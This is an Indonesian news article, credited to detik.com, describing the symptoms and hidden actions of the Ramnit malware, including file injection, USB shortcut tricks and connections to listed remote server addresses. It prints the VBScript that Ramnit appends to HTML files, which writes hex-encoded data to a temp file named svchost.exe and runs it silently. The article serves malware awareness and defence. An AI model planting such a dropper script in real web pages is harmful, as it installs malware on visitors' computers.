Ramnit sejatinya bukan malware baru, namun karena kemampuan amfibinya, ia masih tetap eksis di jagat program jahat hingga saat ini. Lantas seperti apa ciri-ciri komputer yang terifeksi Ramnit?
-. Muncul pop-up iklan, pornografi atau perjudian Dalam beberapa waktu tertentu, browser akan membuka pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (kasino). Hal ini yang terkadang membuat pengguna komputer menjadi tidak nyaman.
-. Icon Removable media (USB Flashdisk) berubah menjadi icon folder
-. User tidak dapat mengakses USB Flash dengan menampilkan pesan 'Access is denied'.
-. Muncul pesan 'Compressed (zipped) Folders' pada saat mengakses Flash disk.
-. Muncul banyak file dengan nama file 'Copy of Shortcut to (1).lnk' sampai dengan 'Copy of Shortcut to (4).lnk' di USB Flash.
-. Salah satu hal yang unik dan membuat virus ini sangat mudah aktif dan sulit dibasmi adalah setiap kali user melakukan klik kanan, selain menampilkan menu klik kanan, secara tidak langsung pengguna komputer juga menjalankan virus ini.
Selain gejala yang kasat mata, Ramnit akan melakukan aksi berbahaya baik yang terlihat maupun tidak terlihat, namun akibatnya sangat terasa dan berbahaya untuk korbannya.
Sebab selain mencuri data dari komputer korban, Ramnit juga melakukan pengunduhan malware lain yang tidak kalah berbahaya seperti Sality, Wapomi, Viking, Renosator, PWSTool, Alman, Kolab dan banyak malware berbahaya lainnya.
Berikut aksi Ramnit yang terkadang tidak kasat mata namun berbahaya:
>. Muncul script error setelah pop-up iklan Setelah pop-up iklan yang muncul, maka akan muncul pop-up error atau script error dari browser. Munculnya script error ini mirip seperti virus 'ARP Spoofing' pada tahun 2008.
>. Injeksi file .exe, .dll Sama seperti varian malware Sality, Alman dan Virut, W32/Ramnit melakukan injeksi file exe. Hanya saja, W32/Ramnit juga melakukan injeksi terhadap file DLL (dynamic load library).
>. File exe dan dll yang diinjeksi akan bertambah sekitar antara 100-120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun begitu, tidak semua file .exe dan .dll di drive C: yang diinjeksi.
>. Injeksi file HTM / HTML Selain menginjeksi file .exe dan .dll, W32/Ramnit juga melakukan injeksi terhadap file HTM dan HTML. Injeksi dilakukan dengan menambahkan pada header dan footer.
Pada header, W32/Ramnit menambahkan script: DropFileName = 'svchost.exe'
>. Sedangkan pada footer, W32/Ramnit menambahkan script:
Set FSO = CreateObject ("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & '\\" DropFileName If FSO.FileExists(DropPath)=False Then Set fileobj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step2 Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2))) Next Fileobj.close End If Set WSHshell = CreateObject ("Wscript.shell") WSHshell.Run DropPath, 0
>. Membuat fungsi services Windows menjadi blank Dengan aksi melakukan injeksi file pada file "iexplore.exe" dan file "services.exe", serta menambahkan script pada file web (htm/html) membuat fungsi dari services Windows menjadi blank.
>. Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus. Beberapa gejala yang terjadi dan penyebabnya dapat dijelaskan sebagai berikut berdasarkan jenis file yang diinjeksi Ramnit:
C:\\WINDOWS\\system32\\svchost.exe, “svchost.ece” adalah file sistem yang berhubungan dengan koneksi jaringan. Akibatnya jaringan komputer akan terputus ketika file ini di injeksi. C:\\WINDOWS\\system32\\lsass.exe, “lsass.exe” adalah file sistem yang berhubungan dengan aktivitas komputer. Akibat injeksi ini, sistem komputer akan menjadi lambat / hang. C:\\WINDOWS\\system32\\services.exe, “services.exe” adalah file sistem yang berhubungan dengan services dan driver yang berjalan. Akibat injeksi ini akan menyebabkan gangguan pada servis dan driver yang di injeksi. C:\\Program Files\\Internet Explorer\\iexplore.exe, “iexplore.exe” adalah file browser Internet Explorer dari Microsoft. Tujuan injeksi ini adalah agar browser bisa dikontrol untuk melakukan koneksi ke remote server yang telah ditentukan oleh Ramnit sebelumnya.
>. Aktif pada proses memori Seperti diutarakan di atas, setelah berhasil menguasai Internet Explorer, W32/Ramnit mencoba melakukan koneksi ke Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE / Internet Explorer
>. Melakukan koneksi ke Remote Server Malware W32/Ramnit melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu di antaranya: 195.2.252.247 195.2.252.252 69.50.193.157 74.125.227.17 74.125.227.18 74.125.227.20 95.211.127.69
>. Melakukan transfer data ke Remote Server Selain mencoba melakukan koneksi dan berkomunikasi dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam komputer korban.
>. Melakukan broadcast Sama seperti halnya worm Conficker, W32/Ramnit juga melakukan broadacast pada jaringan. Yang berbeda adalah untuk W32/Ramnit hanya melakukan pada satu alamat yaitu: ADX.ADNXS.COM.
SUMBER: www.detik.com
CIRI PC/LAPTOP YANG TERKENA VIRUS RAMNIT